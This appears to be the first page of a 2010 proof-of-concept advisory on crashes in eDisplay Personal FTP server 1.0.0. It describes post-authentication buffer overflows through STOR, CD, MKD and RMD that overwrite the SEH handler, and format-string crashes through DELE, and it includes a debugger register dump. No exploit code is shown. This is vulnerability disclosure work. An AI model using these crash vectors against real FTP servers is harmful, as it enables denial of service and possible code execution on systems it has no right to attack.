1 # Title: eDisplay Personal FTP server 1.0.0 Multiple Post−Authentication Crash (PoC)
2 # From: The eh?−Team || The Great White Fuzz (we’re not sure yet)
3 # Found by: loneferret
4 # Hat’s off to dookie2000ca
5 # Disvovery date: 16/03/2010
6 # Software link: http://edisplay−personal−ftp−server.software.informer.com/
7 # Tested on: Windows XP SP3 Professional
8 # Nod to the Exploit−DB Team
9
10 # Vendor informed via email : 17/03/2010
11
12 #THE README PART
13 #The STOR command will crash the server and overwrite a few interesting CPU registers (as shown below).
14 #Other commands that will gives similar results are: CD / MKD / RMD They all overwrite SEH in the same
15 #manner as the STOR command.
16 #During our research, we discovered many other DoS possibilities. These character combinations (%s & %n like DELE)
17 #are pretty good at crashing this application.
18 #As always, if someone wishes to take this further go right ahead. Play nice, and remember where you got it from.
19 #Thank you.
20
21
22 #SEH chain of main thread
23 #Address SE handler
24 #0012C888 41414141
25
26 #EAX 7EFEFEFE
27 #ECX 0012FEF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAA,,,,AAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
28 #EDX 41414141
29 #EBX 0139B8D0
30 #ESP 0012C30C
31 #EBP 0012C894 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAAAAA
AAAAAAA
32 #ESI 00000000
33 #EDI 0012FFFD
34 #EIP 50E14321 FtpSer_1.50E14321
35 #C 0 ES 0023 32bit 0(FFFFFFFF)
36 #P 1 CS 001B 32bit 0(FFFFFFFF)
37 #A 0 SS 0023 32bit 0(FFFFFFFF)
38 #Z 1 DS 0023 32bit 0(FFFFFFFF)
39 #S 0 FS 003B 32bit 7FFDF000(FFF)
40 #T 0 GS 0000 NULL
41 #D 0
42 #O 0 LastErr ERROR_SUCCESS (00000000)
43 #EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
44 #ST0 empty %#.19L
45 #ST1 empty %#.19L
46 #ST2 empty +UNORM 19C4 00000000 7FFDF000
47 #ST3 empty −NAN FFFF 805970D5 F6B61A24
48 #ST4 empty −UNORM F000 0012FFA8 7FFDF6CC
49 #ST5 empty +UNORM 0010 00000000 F6B62000
50 #ST6 empty 0.0
Page 1/2
eDisplay Personal